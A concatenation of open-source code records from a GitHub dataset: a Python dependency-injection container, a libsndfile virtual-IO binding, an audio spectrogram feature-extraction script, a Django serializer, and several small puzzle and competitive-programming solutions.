None or self.__init_exc is not None:\n with self._lock:\n if self.__init_exc is not None:\n raise self.__init_exc\n if self.__init_hooks is not None:\n _logger.debug('call init hooks')\n hooks = self.__init_hooks\n self.__init_hooks = None\n\n disposable = self._services.add(Symbols.at_init, ValueServiceInfo(True))\n try:\n for func in hooks:\n func(self)\n except Exception as e:\n self.__init_exc = e\n raise\n disposable()\n self._services.add(Symbols.at_init, ValueServiceInfo(False))\n\n def _get_service_info(self, key) -> IServiceInfo:\n try:\n return self._services[key]\n except KeyError:\n pass\n # load missing resolver and resolve service info.\n resolver: IServiceInfoResolver = self._services[Symbols.missing_resolver].get(self)\n return resolver.get(self, key)\n\n def __getitem__(self, key):\n _logger.debug('get service by key: %r', key)\n 
self._root.__ensure_init_hooks_called()\n service_info = self._get_service_info(key)\n try:\n return service_info.get(self)\n except ServiceNotFoundError as err:\n raise ServiceNotFoundError(key, *err.resolve_chain)\n\n def get(self, key, d=None) -> Any:\n '''\n get a service by key.\n '''\n try:\n return self[key]\n except ServiceNotFoundError as err:\n if len(err.resolve_chain) == 1:\n return d\n raise\n\n def get_many(self, key) -> List[Any]:\n '''\n get services by key.\n\n ### example\n\n when you registered multi services with the same key,\n you can get them all:\n\n ``` py\n provider.register_value('a', 1)\n provider.register_value('a', 2)\n assert provider.get_many('a') == [2, 1] # rev order\n ```\n '''\n _logger.debug('get services by key: %r', key)\n self._root.__ensure_init_hooks_called()\n service_infos: Iterable[IServiceInfo] = self._services.get_many(key)\n try:\n return [si.get(self) for si in service_infos]\n except ServiceNotFoundError as err:\n raise ServiceNotFoundError(key, *err.resolve_chain)\n\n def enter(self, context: ContextManager[_T]):\n '''\n enter the context.\n\n returns the result of the `context.__enter__()` method.\n '''\n with self._lock:\n if self._exit_stack is None:\n self._exit_stack = ExitStack()\n return self._exit_stack.enter_context(context)\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n with self._lock:\n if self._exit_stack is not None:\n self._exit_stack.__exit__(*args)\n self._exit_stack = None\n\n def register_service_info(self, key, service_info: IServiceInfo):\n '''\n register a `IServiceInfo` by key.\n '''\n if not isinstance(service_info, IServiceInfo):\n raise TypeError('service_info must be instance of IServiceInfo.')\n _logger.debug('register %r with key %r', service_info, key)\n return self._services.add(key, service_info)\n\n def register(self, key, factory, lifetime):\n '''\n register a service factory by key.\n\n `factory` accept a function which require one or zero parameter.\n if the count of parameter is 1, pass a `IServiceProvider` as the argument.\n '''\n return self.register_service_info(key, ServiceInfo(self, key, factory, lifetime))\n\n def register_singleton(self, key, factory):\n '''\n register a service factory by key.\n\n `factory` accept a function which require one or zero parameter.\n if the count of parameter is 1, pass a `IServiceProvider` as the argument.\n '''\n return self.register(key, factory, LifeTime.singleton)\n\n def register_scoped(self, key, factory):\n '''\n register a service factory by key.\n\n `factory` accept a function which require one or zero parameter.\n if the count of parameter is 1, pass a `IServiceProvider` as the argument.\n '''\n return self.register(key, factory, LifeTime.scoped)\n\n def register_transient(self, key, factory):\n '''\n register a service factory by key.\n\n `factory` accept a function which require one or zero parameter.\n if the count of parameter is 1, pass a `IServiceProvider` as the argument.\n '''\n return self.register(key, factory, LifeTime.transient)\n\n def register_value(self, key, value):\n '''\n register a value by key.\n\n equals `register_transient(key, lambda ioc: value)`\n '''\n return self.register_service_info(key, ValueServiceInfo(value))\n\n def register_group(self, key, keys: list):\n '''\n register a grouped `key` for get other `keys`.\n\n the `keys` can be a ref and you can update it later.\n\n for example:\n\n ``` py\n provider.register_value('str', 'name')\n provider.register_value('int', 1)\n provider.register_group('any', 
['str', 'int'])\n        assert provider['any'] == ('name', 1)\n        ```\n\n        equals `register_transient(key, lambda ioc: tuple(ioc[k] for k in keys))`\n        '''\n        return self.register_service_info(key, GroupedServiceInfo(keys))\n\n    def register_bind(self, new_key, target_key):\n        '''\n        bind `new_key` to `target_key` so\n        you can use `new_key` as key to get value from service provider.\n\n        equals `register_transient(new_key, lambda ioc: ioc[target_key])`\n        '''\n        return self.register_service_info(new_key, BindedServiceInfo(target_key))\n\n    def scope(self):\n        '''\n        create a scoped service provider.\n        '''\n        ssp = ServiceProvider(_services=self._services.scope(), _parent=self)\n        return self.enter(ssp)\n\n    @property\n    def builder(self):\n        '''\n        get a new `ServiceProviderBuilder` wrapper for this `ServiceProvider`.\n        '''\n        from .builder import ServiceProviderBuilder\n        return ServiceProviderBuilder(self)\n","repo_name":"Cologler/anyioc-python","sub_path":"anyioc/ioc.py","file_name":"ioc.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18940740389","text":"from ._sndfile import lib, ffi\n\n\n@ffi.def_extern()\ndef vio_get_filelen(user_data):\n    fobj = ffi.from_handle(user_data)\n\n    saved_pos = fobj.tell()\n    end = fobj.seek(0, 2)\n    fobj.seek(saved_pos)\n    return end\n\n\n@ffi.def_extern()\ndef vio_seek(offset, whence, user_data):\n    fobj = ffi.from_handle(user_data)\n    return fobj.seek(offset, whence)\n\n\n@ffi.def_extern()\ndef vio_read(ptr, count, user_data):\n    fobj = ffi.from_handle(user_data)\n    buf = ffi.cast(\"char *\", ptr)\n\n    chunk = fobj.read(count)\n    count = len(chunk)\n    buf[0:count] = chunk\n    return count\n\n\n@ffi.def_extern()\ndef vio_write(ptr, count, user_data):\n    fobj = ffi.from_handle(user_data)\n    buf = ffi.cast(\"char *\", ptr)\n\n    return fobj.write(buf[0:count])\n\n\n@ffi.def_extern()\ndef vio_tell(user_data):\n    fobj = ffi.from_handle(user_data)\n    return fobj.tell()\n\n\ndef get_vio_table():\n    return ffi.new(\n        \"SF_VIRTUAL_IO *\", {\n            'get_filelen': lib.vio_get_filelen,\n            'seek': lib.vio_seek,\n            'read': lib.vio_read,\n            'write': lib.vio_write,\n            'tell': lib.vio_tell\n        })\n","repo_name":"sangoma/sndfile","sub_path":"sndfile/vio.py","file_name":"vio.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"8851658607","text":"'''\n========================================================================================\nThis module is responsible for the following:\n1. As a first step, chunking and padding of variable-length audio files are performed.\n2. The chunked files are 4 seconds long.\n3. This module generates the Feature Set - I, as described in the paper.\n\nThis module uses multiprocessing to speed up the feature engineering part.\n========================================================================================\n\nInput: Train and Test .wav files - variable length\nOutput: \n    1. Train and Test .wav files - fixed length of 4 secs, with 10% overlap between chunks.\n    2. 
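Based only on the API defined in ioc.py above, a usage sketch of the different lifetimes (the exact caching behavior of `LifeTime.singleton` lives in `ioc_service_info.py`, which is not shown, so treat the asserts as expected rather than guaranteed behavior):

```python
provider = ServiceProvider()
provider.register_value('answer', 42)
provider.register_singleton('db', lambda ioc: object())   # one shared instance
provider.register_transient('stamp', lambda: object())    # new on every resolve

assert provider['answer'] == 42
assert provider['db'] is provider['db']
assert provider['stamp'] is not provider['stamp']
assert provider.get('missing', 'fallback') == 'fallback'

scoped = provider.scope()   # registered on the root's exit stack via enter()
scoped_db = scoped['db']    # resolves through the scoped ServicesMap
```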
Mel-scaled spectrograms for Feature Set - I, in the form of pickle files.\n       The generated pickles for the spectrograms have been split into two parts, since a single file would exceed the valid\n       file size.\n'''\n\n\nimport os\nimport numpy as np\nimport IPython\nimport matplotlib\nfrom matplotlib import pyplot as plt\nimport IPython.display as ipd # To play sound in the notebook\nimport librosa\nfrom librosa import display\nimport pandas as pd\nimport pickle\nimport math\nfrom time import time\nfrom multiprocessing import Pool\nfrom joblib import Parallel, delayed\nimport socket, errno, sys\n\n\nnp.random.seed(1)\n\nrootDir = \"/home/ubuntu/kaggle/audioTagger/\"\n\nclass Config(object):\n    def __init__(self,\n                 sampling_rate=22050, n_classes=41,\n                 #data_dir=rootDir+'input/audio_train_trimmed',\n                 n_mels=64, frame_width=80, frame_shift=10):\n        self.sampling_rate = sampling_rate\n        self.n_classes = n_classes\n        #self.data_dir = data_dir\n        self.n_fft = int(frame_width / 1000 * sampling_rate)\n        self.n_mels = n_mels\n        self.frame_width = frame_width\n        self.frame_shift = frame_shift\n        self.hop_length = int(frame_shift / 1000 * sampling_rate)\n\n    \n    \ndef extractFeatures(row, duration=3, cut_duration=4):\n    try:\n        fn = row[0]\n        data_dir = row[1]\n        fname = os.path.join(data_dir, fn)   \n        #data, _ = librosa.load(fname, sr=config.sampling_rate, duration=duration)\n        audio, _ = librosa.load(fname, sr=config.sampling_rate)\n        tot_duration = librosa.core.get_duration(audio)\n        numSamples = math.ceil(tot_duration/cut_duration)\n        logMelCollection = []\n        fnameCollection = []\n        end_marker = 0\n        part_marker = 0\n        while end_marker < tot_duration:   \n            if end_marker == 0:\n                offset = 0\n            else:\n                ## Cut samples with 10% overlap\n                offset = (offset + cut_duration) - (cut_duration*0.1)\n            end_marker = offset + cut_duration\n            data, _ = librosa.load(fname, sr=config.sampling_rate, offset = offset, duration = cut_duration)\n            librosa.output.write_wav(data_dir+'4secs/'+'part'+str(part_marker)+'_'+fn, data, config.sampling_rate)\n            melspec = librosa.feature.melspectrogram(data, sr=config.sampling_rate,\n                                                     n_fft=config.n_fft, hop_length=config.hop_length,\n                                                     n_mels=config.n_mels)\n            logmel = librosa.core.power_to_db(melspec)   \n            logMelCollection.append(logmel)\n            fnameCollection.append(fn)\n            part_marker = part_marker+1\n        return logMelCollection, fnameCollection   \n    except Exception as e:\n        print(\"Error processing file: \",fn)   \n        print(\"Numsamples: \",numSamples)\n        print(\"Total duration: \",tot_duration)\n\n\nconfig = Config(frame_width=80, frame_shift=10)\n\ntrain = pd.read_csv(rootDir + \"input/train.csv\")\ntest = pd.read_csv(rootDir + \"input/sample_submission.csv\")\nprint(\"Removing bad files from test\")\nexclusionFiles = ['0b0427e2.wav','6ea0099f.wav','b39975f5.wav']\ntest = test[~test['fname'].isin(exclusionFiles)]\ntest.reset_index(drop=True, inplace = True)\n\nfile_counter = 1   \nfilesToBeProcessed = []\nfor filename in train.fname:\n    if file_counter % 1000 == 0:\n        print(file_counter)\n    #print(\"Processing :\",filename)\n    filesToBeProcessed.append((filename, rootDir+'input/audio_train_trimmed/'))\n    file_counter = file_counter+1   \n\nnumToProcess = len(filesToBeProcessed)\nprint(\"Number of files to process: Train set\", numToProcess)   \n\nt0 = time()\nnumSubprocess = 50\nprint(\"Starting multiprocessing with\", numSubprocess, \"subprocesses...\" )\npool = Pool(numSubprocess)\ntry:\n    resultSet = pool.map(extractFeatures, filesToBeProcessed)\n    pool.close()\n    pool.join()\nexcept socket.error as e:\n    if e.errno == errno.EPIPE:\n        
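The offset bookkeeping inside `extractFeatures` above is easy to get wrong; a standalone sketch that mirrors it and shows the resulting 4-second windows with 10% overlap:

```python
def chunk_windows(total, cut=4.0, overlap=0.1):
    # Mirrors the loop in extractFeatures: each new chunk starts 10% of a
    # chunk length before the previous one ended.
    offset, windows = 0.0, []
    while offset < total:
        windows.append((offset, offset + cut))
        offset = (offset + cut) - cut * overlap
    return windows

# A 10 s file yields chunk starts 0.0, 3.6, 7.2 (the last chunk runs past the
# end and is zero-padded later):
assert [round(s, 1) for s, _ in chunk_windows(10.0)] == [0.0, 3.6, 7.2]
```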
#remote peer disconnected\n print ({'Status':'Remote Disconnected Error'})\n else:\n print ({'Status':'Other Socket Error'})\nexcept IOError as e: \n print ({'Status':'IOError'})\n\n\nfilenames = []\nX = []\nfor result in resultSet:\n\tfor file_names in result[1]:\n\t\tfilenames.append(file_names)\n\tfor sound_sequence in result[0]:\n\t\tX.append(sound_sequence)\n\nmax_length = np.max([x.shape[1] for x in X])\n# Pad zero to make them all the same length\nX2 = [np.pad(x, ((0, 0), (0, max_length - x.shape[1])), 'constant') for x in X]\n\nmelSpectogramTrain = np.array(X2)\n\nprint(\"Shape of melSpectogramTrain: \", melSpectogramTrain.shape)\nrows = melSpectogramTrain.shape[0]\nrowsToSave = int(rows/2)\nwith open(rootDir + \"input/audio_train_trimmed/4secs/melSpectogramTrain_p1.pkl\", 'wb') as handle:\n pickle.dump(melSpectogramTrain[:rowsToSave], handle) \n\nwith open(rootDir + \"input/audio_train_trimmed/4secs/melSpectogramTrain_p2.pkl\", 'wb') as handle:\n pickle.dump(melSpectogramTrain[rowsToSave:], handle) \n \nwith open(rootDir + \"input/audio_train_trimmed/4secs/filenamesTrain.pkl\", 'wb') as handle:\n pickle.dump(filenames, handle) \n \n################ FOR TEST FILES #########################\n\n\nfile_counter = 1 \nfilesToBeProcessed = []\nfor filename in test.fname:\n if file_counter % 1000 == 0:\n print(file_counter)\n #print(\"Processing :\",filename)\n filesToBeProcessed.append((filename, rootDir+'input/audio_test_trimmed/'))\n file_counter = file_counter+1 \n\nnumToProcess = len(filesToBeProcessed)\nprint(\"Number of files to process: Test set\", numToProcess) \n\nt0 = time()\nnumSubprocess = 50\nprint(\"Starting multiprocessing with\", numSubprocess, \"subprocesses...\" )\npool = Pool(numSubprocess)\ntry:\n resultSet = pool.map(extractFeatures, filesToBeProcessed)\n pool.close()\n pool.join()\nexcept socket.error as e:\n if e.errno == errno.EPIPE:\n #remote peer disconnected\n print ({'Status':'Remote Disconnected Error'})\n else:\n print ({'Status':'Other Socket Error'})\nexcept IOError as e: \n print ({'Status':'IOError'})\n \nfilenames = []\nX = []\nfor result in resultSet:\n\tfor file_names in result[1]:\n\t\tfilenames.append(file_names)\n\tfor sound_sequence in result[0]:\n\t\tX.append(sound_sequence)\n\nmax_length = np.max([x.shape[1] for x in X])\n# Pad zero to make them all the same length\nX2 = [np.pad(x, ((0, 0), (0, max_length - x.shape[1])), 'constant') for x in X]\n\nmelSpectogramTest = np.array(X2)\n\nprint(\"Shape of melSpectogramTest: \", melSpectogramTest.shape)\nwith open(rootDir + \"input/audio_test_trimmed/4secs/melSpectogramTest.pkl\", 'wb') as handle:\n pickle.dump(melSpectogramTest, handle) \n\nwith open(rootDir + \"input/audio_test_trimmed/4secs/filenamesTest.pkl\", 'wb') as handle:\n pickle.dump(filenames, handle) \n \n\n","repo_name":"Gyat/Kaggle_DCASE2018_21st_Solution","sub_path":"FeatureSet_I_With_Chunking.py","file_name":"FeatureSet_I_With_Chunking.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22407273536","text":"from rest_framework import serializers\nfrom .models import Link\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\n\n\nclass LinkSerializer(serializers.ModelSerializer):\n class Meta:\n model = Link\n fields = [\"name\",\"url\"]\n\nclass CustomTokenObtainPairSerializer(TokenObtainPairSerializer):\n @classmethod\n def get_token(cls, user):\n token = super().get_token(user)\n token['username'] = 
user.username\n        return token","repo_name":"anirudh-tiwari/rss-backend","sub_path":"rss_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121548626","text":"# https://atcoder.jp/contests/typical90/submissions/23847062\n# 043 - Maze Challenge with Lack of Sleep(★4)\nimport sys\nfrom collections import deque\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nMOD = 10 ** 9 + 7\n\n\ndef solve():\n    H, W = map(int, input().split())\n    rs, cs = map(lambda z: int(z) - 1, input().split())\n    rt, ct = map(lambda z: int(z) - 1, input().split())\n    S = tuple(input().rstrip() for _ in range(H))\n\n    dp = [[[f_inf] * W for _ in range(H)] for _ in range(2)]\n    dp[0][rs][cs] = dp[1][rs][cs] = 0\n    que = deque([(-1, rs, cs)])  # (previous direction, row of current node, column of current node)\n    while que:\n        p, h, w = que.popleft()\n        for dh, dw in ((0, 1), (1, 0), (0, -1), (-1, 0)):\n            next_h, next_w = h + dh, w + dw\n            if next_h < 0 or next_w < 0 or next_h >= H or next_w >= W or S[next_h][next_w] == \"#\":\n                continue\n            u = 0 if dh == 0 else 1  # u=0: horizontal move, u=1: vertical move\n            x = 0 if p == -1 or p == u else 1  # cost +1 if the direction changes from the previous move\n            cost = dp[p][h][w] + x\n            if dp[u][next_h][next_w] > cost:\n                dp[u][next_h][next_w] = cost\n                que.appendleft((u, next_h, next_w)) if x == 0 else que.append((u, next_h, next_w))\n    print(min(dp[0][rt][ct], dp[1][rt][ct]))\n\n\nif __name__ == '__main__':\n    solve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/Typical90/Typical90_043.py","file_name":"Typical90_043.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32658922569","text":"import sys\n\nn = int(sys.stdin.readline())\n\n# Christmas-tree shape\n# number of stars to print on the last row\nstar = 2*n - 1\n\nfor i in range(n) :\n    for j in range(star) :\n        if (n-1) - i <= j <= (n-1) + i :\n            print(\"*\",end='')\n            # once every star on this row is printed, move straight on to the next row\n            if j == (n-1) + i :\n                break   \n        else :\n            print(end=' ')\n    print()\n\n","repo_name":"KimHyungkeun/Algorithm","sub_path":"Baekjoon/구현/2442_별찍기5.py","file_name":"2442_별찍기5.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22407273536","text":"import sys\n\ntotal = 0\n\nfor i, line in enumerate(sys.stdin):\n    signals, four_digit_output = [x.split() for x in line.split('|')]\n\n    digit_encodings = {}\n\n    # By sorting the signals by length, we can decode the \"easy\" signals\n    # 1, 7 and 4 first. Then use those to disambiguate the 5-segment\n    # and 6-segment digits by using knowledge of how the digit shapes\n    # overlap.\n    for raw_signal in sorted(signals, key=len):\n        signal = frozenset(raw_signal)\n\n        if len(signal) == 2:\n            digit_encodings[1] = signal\n        elif len(signal) == 3:\n            digit_encodings[7] = signal\n        elif len(signal) == 4:\n            digit_encodings[4] = signal\n\n        # We need to differentiate the 5-segment digits using some tricks.\n        # The 5-segment digits are 2, 3, and 5.\n        elif len(signal) == 5:\n            # Trick #1: find \"3\".\n            #\n            # The \"3\" shape is the only 5-segment digit that contains\n            # the \"1\" shape as a subset.\n            if digit_encodings[1].issubset(signal):\n                digit_encodings[3] = signal\n            # Trick #2: find \"5\".\n            #\n            # The \"4\" digit uses segments b + d. 
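The maze solution above is a 0-1 BFS: cost-0 moves go to the front of the deque and cost-1 moves to the back, so nodes come off in nondecreasing distance order without a heap. A generic sketch of the pattern (not from the original submission):

```python
from collections import deque

def zero_one_bfs(adj, start):
    # adj[u] -> iterable of (v, w) with w in {0, 1}.
    INF = float('inf')
    dist = {start: 0}
    dq = deque([start])
    while dq:
        u = dq.popleft()
        for v, w in adj[u]:
            nd = dist[u] + w
            if nd < dist.get(v, INF):
                dist[v] = nd
                # Front for free edges, back for unit-cost edges.
                dq.appendleft(v) if w == 0 else dq.append(v)
    return dist

assert zero_one_bfs({0: [(1, 0), (2, 1)], 1: [(2, 0)], 2: []}, 0) == {0: 0, 1: 0, 2: 0}
```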
You can narrow down the possible\n # wires for those segments by subtracting the \"1\" shape from the \"4\" shape,\n # leaving two possible wires.\n #\n # The \"5\" digit is the only digit that also uses *both* of those wires.\n elif (digit_encodings[4] - digit_encodings[1]).issubset(signal):\n digit_encodings[5] = signal\n # The other possible 5-segment digit is \"2\", soooo...\n else:\n digit_encodings[2] = signal\n\n # Similarly, let's use some tricks to disambiguate the 6-segment digits.\n # The 6-segment digits are 0, 6 and 9.\n elif len(signal) == 6:\n # Trick #1: find \"9\".\n #\n # The \"4\" shape is a subset of the \"9\" shape, unlike \"0\" (which lacks\n # segment d) and \"6\" (which lacks segment c).\n if digit_encodings[4].issubset(signal):\n digit_encodings[9] = signal\n # Trick #2: find \"0\".\n #\n # \"0\" is the only shape which has \"7\" as a sub-shape but not \"4\".\n # Since we reached this condition, we already know 4 is not\n # a subset of this signal's shape. So...\n elif digit_encodings[7].issubset(signal):\n digit_encodings[0] = signal\n # The other possible 6-segment digit is \"6\"\n else:\n digit_encodings[6] = signal\n elif len(signal) == 7:\n digit_encodings[8] = signal\n\n # Invert the map so we can easily look up the signal for each digit\n signal_to_digit = { signal: digit for digit, signal in digit_encodings.items() }\n\n output_number = 0\n four_digit_output.reverse()\n for i, raw_output_signal in enumerate(four_digit_output):\n output_signal = frozenset(raw_output_signal)\n digit = signal_to_digit[output_signal]\n output_number += 10 ** i * digit\n\n total += output_number\n\nprint(total)\n","repo_name":"cycleseven/advent-2021","sub_path":"08/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
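The subset tricks in the comments above can be verified against the canonical seven-segment wiring (a standalone check, using the standard a-g segment names):

```python
# Canonical segment wiring for digits 0-9 (standard seven-segment layout):
SEGMENTS = {
    0: "abcefg", 1: "cf", 2: "acdeg", 3: "acdfg", 4: "bcdf",
    5: "abdfg", 6: "abdefg", 7: "acf", 8: "abcdefg", 9: "abcdfg",
}
shapes = {d: frozenset(s) for d, s in SEGMENTS.items()}

# Trick #1: among the 5-segment digits {2, 3, 5}, only "3" contains "1":
assert [d for d in (2, 3, 5) if shapes[1] <= shapes[d]] == [3]
# Trick #2: only "5" contains the two segments of "4" minus "1" (b and d):
assert [d for d in (2, 3, 5) if (shapes[4] - shapes[1]) <= shapes[d]] == [5]
# 6-segment digits {0, 6, 9}: only "9" contains "4"; of the remainder,
# only "0" contains "7":
assert [d for d in (0, 6, 9) if shapes[4] <= shapes[d]] == [9]
assert [d for d in (0, 6) if shapes[7] <= shapes[d]] == [0]
```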